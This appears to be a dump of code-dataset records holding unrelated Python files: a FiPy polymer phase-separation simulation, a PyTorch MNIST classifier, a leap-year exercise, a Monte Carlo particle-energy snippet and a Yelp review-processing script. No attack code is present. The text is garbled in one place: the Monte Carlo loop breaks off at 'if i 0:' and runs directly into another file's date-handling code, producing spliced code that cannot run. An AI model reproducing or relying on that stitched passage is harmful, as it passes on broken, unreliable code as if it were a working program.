print('old',pid)\nprint('over')\n","sub_path":"python_learn/python_net/fork.py","file_name":"fork.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"453074950","text":"import unittest\nfrom st import run\n\n\nclass MyTestCase(unittest.TestCase):\n    def test_run(self):\n        c = run('c = a + b', key='c', a=1, b=2)\n        self.assertEqual(c, 3)\n\n\nif __name__ == 
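A detail worth noting about `compare_screens` in the page object above: `cv2.subtract` saturates at zero on uint8 images, so pixels where the actual screenshot is brighter than the expected one vanish from the difference. `cv2.absdiff` compares in both directions; a sketch of the symmetric check:

```python
import cv2
import numpy as np

def images_match(path_expected, path_actual):
    expected = cv2.imread(path_expected)
    actual = cv2.imread(path_actual)
    if expected is None or actual is None or expected.shape != actual.shape:
        return False
    # absdiff is symmetric, unlike the saturating cv2.subtract.
    return not np.any(cv2.absdiff(expected, actual))
```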
'__main__':\n unittest.main()\n","sub_path":"tests/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29224734","text":"\nfrom fipy import CellVariable, GaussianNoiseVariable, DiffusionTerm, TransientTerm, ImplicitSourceTerm, VTKCellViewer, LinearLUSolver\nfrom fipy.tools import numerix\nimport time\nfrom fipy import PeriodicGrid2D, Viewer, UniformNoiseVariable\n\n# Simulation parameters\n# Mesh resolution and domain size\nnx = ny = 50\ndx = dy = 1.0\n# Initial composition\na_0 = 0.77\n# Noise magnitude\nnoise_mag = 0.03\n# Flory-Huggins interaction parameter\nchi_AB = 0.006\n# Length of polymer chains\nn_a = 1000\nn_b = 1000\n\n# Defining the mesh\nmesh = PeriodicGrid2D(nx=nx, ny=ny, dx=dx, dy=dy)\n\n# Defining the variables\na = CellVariable (name=r\"$a$\", mesh=mesh, hasOld=1)\nmu_AB = CellVariable(name=r\"$\\mu_{AB}\", mesh=mesh, hasOld=1)\n\n# Setting the initial composition of the system with noise\nnoise = UniformNoiseVariable(mesh=mesh, minimum=(a_0-noise_mag), maximum=(a_0+noise_mag))\na[:] = noise\n\n# differentiate g(a)\ndgda = ((1.0/n_a) - (1.0/n_b)) + (1.0/n_a)*numerix.log(a) - (1.0/n_b)*numerix.log(1.0 - a) + chi_AB*(1.0 - 2*a)\nd2gda2 = (1.0/(n_a*a)) + (1.0/(n_b*(1.0 - a))) - 2*chi_AB\n\n# Evaluate kappa\nkappa = (2.0/3.0)*chi_AB\n\n# Defining the equations\neq1 = (TransientTerm(var=a)) == DiffusionTerm(coeff=a*(1.0-a), var=mu_AB)\neq2 = (ImplicitSourceTerm(coeff=1.0, var=mu_AB)) == dgda - DiffusionTerm(coeff=kappa, var=a)\n# eq2 = (ImplicitSourceTerm(coeff=1.0, var=mu_AB)) == ImplicitSourceTerm(coeff=d2gda2, var=a) - d2gda2*a + dgda - DiffusionTerm(coeff=kappa, var=a)\n\n# Coupling the equations\neq = eq1 & eq2\n\n# Setting up the solver\nsolver = LinearLUSolver(tolerance=1e-9, iterations=50, precon=\"ilu\")\n\n# Set up time stepping\ndt = 10.0\nduration = 20000\ntime_stride = 100\ntimestep = 0\nelapsed =0\n\n# Initialising the viewer\nif __name__ == \"__main__\":\n viewer = Viewer(vars=(a), datamin=0., datamax=1.)\n\n# start the time\nstart = time.time()\n\n# Time stepping\nwhile elapsed < duration: \n elapsed += dt\n timestep += 1\n a.updateOld()\n mu_AB.updateOld()\n res = 1e4\n while res > 1e-10:\n res = eq.sweep(dt=dt, solver=solver)\n print (\"sweep\")\n print (res)\n print (elapsed)\n end = time.time()\n print (end-start)\n if (timestep % time_stride ==0):\n print (\"Beep\")\n if __name__ == '__main__':\n viewer.plot()\nif __name__ == '__main__':\n input(\"Press to proceed...\")\n\n# Code for VTK ouput\n# while elapsed < duration: \n# if (timestep == 0):\n# vw = VTKCellViewer(vars=(a, mu_AB))\n# vw.plot(filename=\"0_output.vtk\")\n# elapsed += dt\n# timestep += 1\n# a.updateOld()\n# mu_AB.updateOld()\n# res = 1e+10\n# while res > 1e-10:\n# res = eq.sweep(dt=dt, solver=solver)\n# print (\"sweep!\")\n# print (elapsed)\n# end = time.time()\n# print(end-start)\n# if (timestep % time_stride ==0):\n# vw = VTKCellViewer(vars=(a, mu_AB))\n# vw.plot(filename=\"%s_output.vtk\" %(elapsed))\n\n\n ","sub_path":"Figures/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"139808908","text":"import torch\nfrom torch.autograd import Variable\nfrom torch import FloatTensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as 
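The FiPy record above follows the library's usual pipeline: build a mesh, declare `CellVariable`s, assemble equations from terms, then sweep repeatedly per time step. A much smaller sketch of the same pipeline, plain 1D transient diffusion, isolates the moving parts; the mesh size and time step here are arbitrary:

```python
# Minimal FiPy pipeline: mesh -> variable -> equation -> time stepping.
from fipy import CellVariable, DiffusionTerm, Grid1D, TransientTerm

mesh = Grid1D(nx=50, dx=1.0)
phi = CellVariable(name="phi", mesh=mesh, value=0.0)
phi.constrain(1.0, mesh.facesLeft)   # fixed-value boundary on the left

eq = TransientTerm() == DiffusionTerm(coeff=1.0)
for _ in range(10):
    eq.solve(var=phi, dt=0.9)
print(phi.value[:5])
```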
plt\nimport pandas as pd\nimport gzip\nimport pickle\n\n\nclass MLPClassifier(nn.Module):\n def __init__(self, input_dim = 784, hidden_nodes=100, output_dim=10):\n super(MLPClassifier, self).__init__()\n self.lin_input = nn.Linear(input_dim, hidden_nodes)\n self.lin_hidden = nn.Linear(hidden_nodes, hidden_nodes)\n self.lin_output = nn.Linear(hidden_nodes, output_dim)\n def forward(self, x):\n x = self.lin_input(x)\n x = F.relu(x)\n x = self.lin_hidden(x)\n x = F.sigmoid(x)\n x = self.lin_output(x)\n # Apply output conversion\n x = F.sigmoid(x)\n return x\n\ndef weights_init(model):\n for m in model.modules():\n if isinstance(m, nn.Linear):\n # initialize the weight tensor, here we use a normal distribution\n m.weight.data.normal_(0, 1)\n #m.weight.data.normal_(0.1,0.2)\n\ndef calc_miscl_err(X, Y, Yhat):\n \"\"\"\n Calculate the misclassification error (according to class canvas)\n \"\"\"\n indsYhat=np.argmax(Yhat,axis=1)\n indsY=np.argmax(Y,axis=1)\n errors = (indsYhat-indsY)!=0\n return (100*sum(errors)/(Yhat.shape[0]*1.0))\n\ndef calc_avg_sq_err(X, Y, Y_hat):\n \"\"\"\n Function for calculating the average squared error\n \"\"\"\n # Define dimensionality\n N = len(X)\n d = len(X[0])\n # Calculate the error\n error = ((1)/(2*N)) * (np.linalg.norm( Y - Y_hat ))**2\n return error\ndef stand(x):\n # gives an affine transformation to place x between 0 and 1 (from canvas)\n x=x-np.min(x[:])\n x=x/(np.max(x[:])+1e-12)\n return x\n\ndef plot_10(X, eta, epochs):\n \"\"\"\n Visualize ten weights\n \"\"\"\n fig = plt.figure(figsize=(16,6))\n f, axarr = plt.subplots(2, 5)\n axarr[0, 0].imshow(stand(X[1]).reshape(28,28), cmap='gray')\n axarr[0, 0].set_title('Node 1')\n axarr[0, 1].imshow(stand(X[3]).reshape(28,28), cmap='gray')\n axarr[0, 1].set_title('Node 2')\n axarr[0, 2].imshow(stand(X[5]).reshape(28,28), cmap='gray')\n axarr[0, 2].set_title('Node 3')\n axarr[0, 3].imshow(stand(X[7]).reshape(28,28), cmap='gray')\n axarr[0, 3].set_title('Node 4')\n axarr[0, 4].imshow(stand(X[9]).reshape(28,28), cmap='gray')\n axarr[0, 4].set_title('Node 5')\n axarr[1, 0].imshow(stand(X[11]).reshape(28,28), cmap='gray')\n axarr[1, 0].set_title('Node 6')\n axarr[1, 1].imshow(stand(X[13]).reshape(28,28), cmap='gray')\n axarr[1, 1].set_title('Node 7')\n axarr[1, 2].imshow(stand(X[15]).reshape(28,28), cmap='gray')\n axarr[1, 2].set_title('Node 8')\n axarr[1, 3].imshow(stand(X[17]).reshape(28,28), cmap='gray')\n axarr[1, 3].set_title('Node 9')\n axarr[1, 4].imshow(stand(X[19]).reshape(28,28), cmap='gray')\n axarr[1, 4].set_title('Node 10')\n plt.savefig(\"Problem_3.1_\"+str(eta)+\"_\"+str(epochs)+\"_weights.png\", bbox_inches='tight')\n plt.close(fig)\n\ndef plot_single(data):\n \"\"\"\n Plot a single digit\n \"\"\"\n plt.imshow(data.reshape(28,28), cmap='gray')\n plt.title('Digit')\n plt.show()\n\ndef main():\n \"\"\"\n Main function to run the procedure\n \"\"\"\n # Import all the data and define some dimensionalities\n print(\"Reading in data...\")\n with gzip.open(\"mnist.pkl.gz\") as f:\n train_set, dev_set, test_set = pickle.load(f, encoding = 'bytes')\n Xtrain = train_set[0]\n train_label = train_set[1]\n Xdev = dev_set[0]\n dev_label = dev_set[1]\n Xtest = test_set[0]\n test_label = test_set[1]\n N_train = len(Xtrain)\n d = len(Xtrain[0])\n # Add bias to data\n Xtrain[:, 783] = 1\n Xdev[:, 783] = 1\n Xtest[:, 783] = 1\n # Create label matrices\n Ytrain = np.zeros(len(Xtrain)*10).reshape(len(Xtrain), 10)\n Ydev = np.zeros(len(Xdev)*10).reshape(len(Xdev), 10)\n Ytest = np.zeros(len(Xtest)*10).reshape(len(Xtest), 
10)\n for i in range(len(Xtrain)):\n Ytrain[i, train_label[i]] = 1\n for i in range(len(Xdev)):\n Ydev[i, dev_label[i]] = 1\n for i in range(len(Xtest)):\n Ytest[i, test_label[i]] = 1\n print(\"...done\")\n print()\n # Load model and initialize weigths and loss function\n model = MLPClassifier()\n weights_init(model)\n loss_func = nn.MSELoss()\n # Define further parameters\n epochs = 500\n m = 100\n eta = 0.1\n # Define optimizer as stochastic gradient descent\n optimizer = optim.SGD(model.parameters(), lr=eta, momentum=0.9)\n # Number of iterations per standard epoch\n iterations = int(N_train/m)\n # Create tensors for pytorch\n Xtrain_pt = Variable(FloatTensor(Xtrain), requires_grad=False)\n Ytrain_pt = Variable(FloatTensor(Ytrain), requires_grad=False)\n Xdev_pt = Variable(FloatTensor(Xdev), requires_grad=False)\n Ydev_pt = Variable(FloatTensor(Ydev), requires_grad=False)\n Xtest_pt = Variable(FloatTensor(Xtest), requires_grad=False)\n Ytest_pt = Variable(FloatTensor(Ytest), requires_grad=False)\n # Create Arrays for storing the errors\n error_train_arr = np.array(0)\n error_train_arr = np.delete(error_train_arr, 0)\n error_dev_arr = np.array(0)\n error_dev_arr = np.delete(error_dev_arr, 0)\n error_test_arr = np.array(0)\n error_test_arr = np.delete(error_test_arr, 0)\n misc_train_arr = np.array(0)\n misc_train_arr = np.delete(misc_train_arr, 0)\n misc_dev_arr = np.array(0)\n misc_dev_arr = np.delete(misc_dev_arr, 0)\n misc_test_arr = np.array(0)\n misc_test_arr = np.delete(misc_test_arr, 0)\n # Start training the neural network\n print(\"Starting training of MLP Classifier\")\n print()\n for i in range(epochs):\n # For each epoch, shuffle Training set randomly but keep target value assignments\n temp = np.append(Xtrain, Ytrain, axis=1)\n temp_shuffled = np.random.shuffle(temp)\n Xtrain_shuffled = temp[:,:784]\n Ytrain_shuffled = temp[:,784:]\n # Start looping over the minibatches\n for j in range(iterations):\n # Create random minibatches\n #indices = np.random.randint(0, len(Xtrain), 200)\n #Ymini_pt = Variable(FloatTensor(Ytrain_shuffled[indices]), requires_grad=False)\n #Xmini_pt = Variable(FloatTensor(Xtrain_shuffled[indices]), requires_grad=False)\n # Create minibatches\n Xmini_pt = Variable(FloatTensor(Xtrain_shuffled[j*m:(j*m)+m, :]), requires_grad=False)\n Ymini_pt = Variable(FloatTensor(Ytrain_shuffled[j*m:(j*m)+m, :]), requires_grad=False)\n # Initialize optimizer\n optimizer.zero_grad()\n # Predict label from subset\n Y_hat_pt = model(Xmini_pt)\n # Compute error every half epoch\n if ( j == 0 or j == int(iterations/2)):\n misc_err_train = calc_miscl_err(Xtrain_pt.data.numpy(), Ytrain_pt.data.numpy(), model(Xtrain_pt).data.numpy())\n sq_err_train = calc_avg_sq_err(Xtrain_pt.data.numpy(), Ytrain_pt.data.numpy(), model(Xtrain_pt).data.numpy())\n misc_train_arr = np.append(misc_train_arr, misc_err_train)\n error_train_arr = np.append(error_train_arr, sq_err_train)\n misc_err_test = calc_miscl_err(Xtest_pt.data.numpy(), Ytest_pt.data.numpy(), model(Xtest_pt).data.numpy())\n sq_err_test = calc_avg_sq_err(Xtest_pt.data.numpy(), Ytest_pt.data.numpy(), model(Xtest_pt).data.numpy())\n misc_test_arr = np.append(misc_test_arr, misc_err_test)\n error_test_arr = np.append(error_test_arr, sq_err_test)\n misc_err_dev = calc_miscl_err(Xdev_pt.data.numpy(), Ydev_pt.data.numpy(), model(Xdev_pt).data.numpy())\n sq_err_dev = calc_avg_sq_err(Xdev_pt.data.numpy(), Ydev_pt.data.numpy(), model(Xdev_pt).data.numpy())\n misc_dev_arr = np.append(misc_dev_arr, misc_err_dev)\n error_dev_arr = 
np.append(error_dev_arr, sq_err_dev)\n            # Calculate loss on minibatch\n            loss = loss_func.forward(Y_hat_pt, Ymini_pt)\n            # Perform backpropagation\n            loss.backward()\n            # Take an optimizer step\n            optimizer.step()\n        # Print output for loop control\n        print(\"Epoch: %i, Error: %3.2f, Miscl. rate: %3.2f%% (all on dev set)\" % (i+1, sq_err_dev, misc_err_dev))\n\n    #Print out lowest errors\n    print()\n    print(\"+++ Results: +++\")\n    print(\"Lowest avg. sq. loss on training set: %3.5f at it. step %i\" % (np.amin(error_train_arr), np.argmin(error_train_arr)*0.5))\n    print(\"Lowest avg. sq. loss on dev set: %3.5f at it. step %i\" % (np.amin(error_dev_arr), np.argmin(error_dev_arr)*0.5))\n    print(\"Lowest avg. sq. loss on test set: %3.5f at it. step %i\" % (np.amin(error_test_arr), np.argmin(error_test_arr)*0.5))\n    print(\"Lowest miscl. error rate on training set: %3.2f%% at it. step %i\" % (np.amin(misc_train_arr), np.argmin(misc_train_arr)*0.5))\n    print(\"Lowest miscl. error rate on dev set: %3.2f%% at it. step %i\" % (np.amin(misc_dev_arr), np.argmin(misc_dev_arr)*0.5))\n    print(\"Lowest miscl. error rate on test set: %3.2f%% at it. step %i\" % (np.amin(misc_test_arr), np.argmin(misc_test_arr)*0.5))\n    print(\"Smallest number of total mistakes on training set: %i/60000 at it. step %i\" % (np.amin(misc_train_arr)*60000/100, np.argmin(misc_train_arr)*0.5))\n    print(\"Smallest number of total mistakes on dev set: %i/10000 at it. step %i\" % (np.amin(misc_dev_arr)*10000/100, np.argmin(misc_dev_arr)*0.5))\n    print(\"Smallest number of total mistakes on test set: %i/10000 at it. step %i\" % (np.amin(misc_test_arr)*10000/100, np.argmin(misc_test_arr)*0.5))\n    print()\n    # Extract some weights from input hidden_nodes\n    model_list = list(model.parameters())\n    model_weights = model_list[0].data.numpy()\n    # Create plots\n    x = np.arange(1,2*epochs+1,1, dtype='float')\n    x /= 2\n    fig = plt.figure(figsize=(16,6))\n    plt.subplot(1,2,1)\n    #axes = plt.gca()\n    #axes.set_ylim([0.01,0.1])\n    plt.semilogy(x, error_train_arr, label = \"Training error\", linewidth=2)\n    plt.semilogy(x, error_dev_arr, label = \"Dev error\", linewidth=2)\n    plt.semilogy(x, error_test_arr, label = \"Test error\", linewidth=2)\n    plt.grid(True)\n    plt.xlabel(\"Standardized epoch\")\n    plt.ylabel(\"Averaged squared error\")\n    plt.legend()\n    plt.subplot(1,2,2)\n    axes = plt.gca()\n    axes.set_ylim([0,90])\n    plt.plot(x, misc_train_arr, label = \"Training misclassification\", linewidth=2)\n    plt.plot(x, misc_dev_arr, label = \"Dev misclassification\", linewidth=2)\n    plt.plot(x, misc_test_arr, label = \"Test misclassification\", linewidth=2)\n    plt.grid(True)\n    plt.xlabel(\"Standardized epoch\")\n    plt.ylabel(\"Misclassification rate in %\")\n    plt.legend()\n    plt.savefig(\"Problem_3.1_\"+str(eta)+\"_\"+str(epochs)+\".png\", bbox_inches='tight')\n    plt.close(fig)\n    # Plot weights\n    plot_10(model_weights, eta, epochs)\n\n\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Assignments/A4/Problem_3/Problem_3.1.py","file_name":"Problem_3.1.py","file_ext":"py","file_size_in_byte":11000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"139003285","text":"#An extra day is added to the calendar almost every four years as February 29,\r\n# and the day is called a leap day. It corrects the calendar for the fact that\r\n# our planet takes approximately 365.25 days to orbit the sun. 
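One simplification for the MLP script above: its per-epoch shuffle concatenates `Xtrain` and `Ytrain` with `np.append` only to shuffle them together and split them again. Indexing both arrays with a single random permutation gives the same result without the copy-and-split round trip; a sketch with stand-in arrays:

```python
import numpy as np

Xtrain = np.arange(12).reshape(6, 2)   # stand-ins for the script's arrays
Ytrain = np.eye(6)

# One permutation keeps X rows aligned with their one-hot labels.
perm = np.random.permutation(len(Xtrain))
Xtrain_shuffled, Ytrain_shuffled = Xtrain[perm], Ytrain[perm]
```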
A leap year\r\n# contains a leap day.\r\n#In the Gregorian calendar, 3 conditions are used to identify leap years:\r\n# -The year can be evenly divided by 4, is a leap year, unless:\r\n# - The year can be evenly divided by 100, it is NOT a leap year, unless:\r\n# - The year is also evenly divisible by 400. Then it is a leap year.\r\n\r\n#This means that in the Gregorian calendar, the years 2000 and 2400 are leap\r\n#years, while 1800, 1900, 2100, 2200, 2300 and 2500 are NOT leap years.\r\n\r\n#Task:\r\n# Given a year, determine whether it is a leap year. If it is a leap year,\r\n#return the Boolean True, otherwise return False.\r\n\r\n#leap year function\r\ndef is_leap(year):\r\n\r\n if year % 4 == 0 and year % 100 == 0 and year % 400 == 0:\r\n leap = True\r\n elif year % 4 == 0 and not year % 100 == 0 and not year % 400 == 0:\r\n leap = True\r\n else:\r\n leap = False\r\n\r\n return(leap)\r\n\r\n#User year input\r\nyear = int(input('Enter a year to check if it is a leap year: '))\r\nis_leap(year)\r\n","sub_path":"Basics/Write_a_func.py","file_name":"Write_a_func.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"525439439","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 9 23:38:40 2017\r\n\r\n@author: Carlos\r\n\"\"\"\r\n\r\n\"\"\"NOOOB PROJECT\"\"\"\r\n\r\nimport random as ran\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\nN=60\r\nsteps=5000\r\nLred=math.pow(N/0.5,1/3)\r\nAred=0.8\r\ndelta=1/4\r\ndef distance(xi,xii,yi,yii,zi,zii):\r\n sq1 = xi-xii-Lred*math.floor((xi-xii)/Lred+0.5)\r\n sq2 = yi-yii-Lred*math.floor((yi-yii)/Lred+0.5)\r\n sq3 = zi-zii-Lred*math.floor((zi-zii)/Lred+0.5)\r\n \r\n sq1=sq1*sq1\r\n sq2=sq2*sq2\r\n sq3=sq3*sq3 \r\n \r\n return math.sqrt(sq1 + sq2 + sq3)\r\n \r\n \r\nr=np.zeros([N,3])\r\nfor i in range(N):\r\n r[i,0]=ran.random()*Lred\r\n r[i,1]=ran.random()*Lred\r\n r[i,2]=ran.random()*Lred\r\n\r\nE=0 \r\nfor i in range(N):\r\n for j in range(N):\r\n Etemp=0\r\n if i 0:\n\t\t\t\t\tall_dates.append(iso_date_from_date(date))\n\t\t\t\telse:\n\t\t\t\t\tall_dates.append(\"\")\n\t\t\t\tbar.next()\n\t\t\tbar.finish()\n\n\t\t\trev_df.insert(8, \"iso_date\", all_dates, True) \n\t\t\trev_df.to_csv(filepath, index=False)\n\n\t\t\tprint(\"----------------------------------------------------------\")\n\n\ndef sort():\n\t\n\tprint(\"Reading cuisines...\")\n\tdf = pd.read_csv(\"./cuisines.csv\")\n\n\tprint(\"----------------------------------------------------------\")\n\n\t# print(\"Fixing dates...\")\n\t# print(\"----------------------------------------------------------\")\t\n\n\t# fix_all_dates()\n\t\n\tfor i, row in df.iterrows():\n\t\t\n\t\tcuisine_name = row[\"cuisine_name\"]\n\t\tfilepath = \"./cuisines/\" + cuisine_name + \"/reviews.csv\"\n\n\t\tif path.exists(filepath):\n\n\t\t\tprint(\"{0}/{1} Sorting reviews for: {2}\".format(i + 1, len(df.index), cuisine_name))\n\n\t\t\trev_df = pd.read_csv(filepath)\n\t\t\trev_df = rev_df.sort_values(by=['iso_date'], ascending=False)\n\n\t\t\trev_df.to_csv(filepath, index=False)\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\ndef nltk_tag_to_wordnet_tag(nltk_tag):\n\tif nltk_tag.startswith('J'):\n\t\treturn wordnet.ADJ\n\telif nltk_tag.startswith('V'):\n\t\treturn wordnet.VERB\n\telif nltk_tag.startswith('N'):\n\t\treturn wordnet.NOUN\n\telif nltk_tag.startswith('R'):\n\t\treturn wordnet.ADV\n\telse: \n\t\treturn None\n\n\ndef 
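The three Gregorian rules in the leap-year record above collapse into one boolean expression, and the standard library ships the same predicate as `calendar.isleap`; a sketch:

```python
import calendar

def is_leap(year):
    # Divisible by 4, except centuries, except centuries divisible by 400.
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)

for y in (1900, 2000, 2023, 2024):
    assert is_leap(y) == calendar.isleap(y)
print(is_leap(2000), is_leap(1900))  # True False
```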
clean_sentence(sentence):\n\n\tsentence = sentence.translate(str.maketrans('', '', string.punctuation))\n\tsentence = sentence.lower()\n\n\tstop_words = set(stopwords.words('english'))\n\n\tword_tokens = nltk.word_tokenize(sentence)\n\n\tfiltered_sentence = []\n\tfor w in word_tokens:\n\t\tw = w.strip()\n\t\tif not w in stop_words and len(w) > 3:\n\t\t\tfiltered_sentence.append(w)\n\n\tfiltered_sentence = [w for w in word_tokens if not w in stop_words and len(w) > 3]\n\n\t# tokenize the sentence and find the POS tag for each token\n\tnltk_tagged = nltk.pos_tag(filtered_sentence)\n\n\t#tuple of (token, wordnet_tag)\n\twordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)\n\tlemmatized_sentence = []\n\tfor word, tag in wordnet_tagged:\n\t\tif tag is None:\n\t\t\t#if there is no available tag, append the token as is\n\t\t\tlemmatized_sentence.append(word)\n\t\telse: \n\t\t\t#else use the tag to lemmatize the token\n\t\t\tlemmatized_sentence.append(lemmatizer.lemmatize(word, tag))\n\n\tfinal = \" \".join(lemmatized_sentence)\n\n\treturn final\n\n\ndef restaurants_for_cuisine(cuisine):\n\n\trestaurants = []\n\n\twith open(RAW_BUSINESS_PATH) as f:\n\t\tall_lines = f.readlines()\n\t\tfor line in all_lines:\n\t\t\td = json.loads(line)\n\t\t\tcategories = d['categories']\n\t\t\tif len(categories) > 0 and any(s.startswith(cuisine) for s in categories):\n\t\t\t\trestaurants.append(d['business_id'])\n\n\treturn restaurants\n\n\ndef all_reviews():\n\t\n\treviews = []\n\n\twith open(RAW_REVIEW_PATH) as f:\n\t\tall_lines = f.readlines()\n\t\tbar = ChargingBar('Reading reviews...', max=len(all_lines))\n\t\tfor line in all_lines:\n\t\t\td = json.loads(line)\n\t\t\tif len(d) > 0:\n\t\t\t\treviews.append(d)\n\t\t\tbar.next()\n\t\tbar.finish()\n\n\treturn reviews\n\n\ndef reviews_to_csv(reviews):\n\t\n\tif len(reviews) > 0:\n\t\t\n\t\tprint(\"Reading cuisines...\")\n\t\tc_df = pd.read_csv('cuisines.csv')\n\n\t\tprint(\"----------------------------------------------------------\")\n\n\t\tfor i, row in c_df.iterrows():\n\t\t\tcuisine_name = row['cuisine_name']\n\t\t\trestaurants = restaurants_for_cuisine(cuisine_name)\n\n\t\t\tfilepath = \"./cuisines/\" + cuisine_name\n\n\t\t\tprint(\"{0}/{1} Writing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\t\t\t\n\t\t\tcolumns = ['business_id', 'votes_funny', 'votes_useful', 'votes_cool', 'user_id', 'review_id', 'stars', 'date', 'text', 'cleaned_text']\n\n\t\t\tdata = {\n\t\t\t\t'business_id' : [],\n\t\t\t\t'votes_funny' : [],\n\t\t\t\t'votes_useful' : [],\n\t\t\t\t'votes_cool' : [],\n\t\t\t\t'user_id' : [],\n\t\t\t\t'review_id' : [],\n\t\t\t\t'stars' : [],\n\t\t\t\t'date' : [],\n\t\t\t\t'text' : [],\n\t\t\t\t'cleaned_text' : []\n\t\t\t}\n\n\t\t\tif len(restaurants) > 0:\n\t\t\t\tbar = ChargingBar('Creating CSV', max=len(reviews), suffix='%(index)d / %(max)d | %(percent)d%%')\n\t\t\t\tfor r in reviews:\n\t\t\t\t\tbusiness_id = r['business_id']\n\t\t\t\t\tif business_id in 
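`clean_sentence` above strips punctuation and stopwords, POS-tags the remaining tokens, maps Penn Treebank tags to WordNet tags, and lemmatizes with that POS. The tag-mapping-plus-lemmatize core, condensed (assumes the NLTK `punkt`, tagger, and `wordnet` data have been downloaded):

```python
import nltk
from nltk.corpus import wordnet
from nltk.stem import WordNetLemmatizer

lemmatizer = WordNetLemmatizer()
# First letter of the Penn Treebank tag -> WordNet POS; default to noun.
TAG_MAP = {"J": wordnet.ADJ, "V": wordnet.VERB, "N": wordnet.NOUN, "R": wordnet.ADV}

def lemmatize_sentence(sentence):
    tagged = nltk.pos_tag(nltk.word_tokenize(sentence))
    return " ".join(
        lemmatizer.lemmatize(word, TAG_MAP.get(tag[0], wordnet.NOUN))
        for word, tag in tagged
    )

print(lemmatize_sentence("The dishes were cooked perfectly"))
```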
restaurants:\n\t\t\t\t\t\tdata['business_id'].append(business_id)\n\t\t\t\t\t\tdata['votes_funny'].append(r['votes']['funny'])\n\t\t\t\t\t\tdata['votes_useful'].append(r['votes']['useful'])\n\t\t\t\t\t\tdata['votes_cool'].append(r['votes']['cool'])\n\t\t\t\t\t\tdata['user_id'].append(r['user_id'])\n\t\t\t\t\t\tdata['review_id'].append(r['review_id'])\n\t\t\t\t\t\tdata['stars'].append(r['stars'])\n\t\t\t\t\t\tdata['date'].append(r['date'])\n\t\t\t\t\t\tdata['text'].append(r['text'])\n\t\t\t\t\t\tdata['cleaned_text'].append(clean_sentence(r['text']))\n\t\t\t\t\tbar.next()\n\t\t\t\tbar.finish()\n\n\t\t\tnew_df = pd.DataFrame(data, columns=columns)\n\t\t\tnew_df.to_csv(filepath + '/reviews.csv', index=False)\n\t\t\t\n\t\t\tprint(\"----------------------------------------------------------\")\n\n\ndef reviews():\n\t\n\treviews = all_reviews()\n\n\treviews_to_csv(reviews)\n\n\ndef reviews_to_txt():\n\n\tprint(\"Reading cuisines...\")\n\tc_df = pd.read_csv('cuisines.csv')\n\n\tprint(\"----------------------------------------------------------\")\n\n\tfor i, row_i in c_df.iterrows():\n\t\tcuisine_name = row_i['cuisine_name']\n\n\t\tfilepath = './cuisines/' + cuisine_name + '/reviews.csv'\n\n\t\tprint(\"{0}/{1} Processing reviews for: {2}\".format(i + 1, len(c_df.index), cuisine_name))\n\n\t\tif path.exists(filepath):\n\t\t\trev_df = pd.read_csv(filepath)\n\t\t\tall_reviews = ''\n\t\t\tall_cleaned_reviews = ''\n\t\t\t\n\t\t\tbar = ChargingBar('Reading reviews', max=len(rev_df.index), suffix='%(index)d / %(max)d | %(percent)d%%')\n\t\t\tfor j, row_j in rev_df.iterrows():\n\t\t\t\tall_reviews += row_j['text'] + ' '\n\t\t\t\tall_cleaned_reviews += clean_sentence(row_j['text']) + ' '\n\t\t\t\tbar.next()\n\t\t\tbar.finish()\n\t\t\t\n\t\t\twrite_path = './cuisines/' + cuisine_name + '/'\n\t\t\t\n\t\t\tprint('Writing to txt...')\n\n\t\t\twith open(write_path + 'reviews_text.txt', 'w') as w:\n\t\t\t\tw.write(all_reviews)\n\n\t\t\twith open(write_path + 'reviews_cleaned_text.txt', 'w') as w:\n\t\t\t\tw.write(all_cleaned_reviews)\n\n\t\t\tprint(\"----------------------------------------------------------\")\n\n\ndef write_similarity(cuisine_matrix, cuisines, clusters=[]):\n\t\n\tprint(\"Writing files...\")\n\n\twith open('cuisine_sim_matrix' + '.csv', 'w') as f:\n\t\tfor i_list in cuisine_matrix:\n\t\t\ts = \"\"\n\t\t\tmy_max = max(i_list)\n\t\t\t\n\t\t\tfor tt in i_list:\n\t\t\t\ts = s + str(tt / my_max) + \" \"\n\t\t\ts = s.strip()\n\t\t\t\n\t\t\tf.write(\",\".join(s.split())+\"\\n\") #should the list be converted to m\n\n\twith open('cuisine_indices' + '.txt', 'w') as f:\n\t\tf.write(\",\".join(cuisines)+\"\\n\")\n\n\twrite_similarity_matrix_for_viz(cuisines, clusters)\n\n\ndef write_similarity_matrix_for_viz(cuisines, clusters=[], symmetric=True):\n\n\td = {}\n\tcount = 0\n\tfor c in cuisines:\n\t\td[c] = clusters[count] if len(clusters) > 0 else 0\n\t\tcount += 1\n\n\tnew_cat = cuisines\n\n\tprint(\"Writing CSV for Viz\")\n\n\tall_lines = []\n\n\twith open('cuisine_sim_matrix.csv', 'r') as f:\n\t\tfor line in f:\n\t\t\tall_lines.append(line)\n\n\tcolors = [\"#3a86ff\", \"#8338ec\", \"#ff006e\", \"#fb5607\", \"#ffbe0b\"]\n\n\tdf = pd.DataFrame(columns=[\"name_x\", \"name_y\", \"sim\", \"color\", \"cluster\"])\n\n\tsim_matrix = []\n\tbar = ChargingBar('Writing', max=len(all_lines))\n\tfor line in all_lines:\n\t\tall_sims = line.split(',')\n\t\tsim_matrix.append(all_sims)\n\n\tcount = 0\t\n\tfor cat in new_cat:\n\t\tcur_cat = cat\n\t\tall_sims = 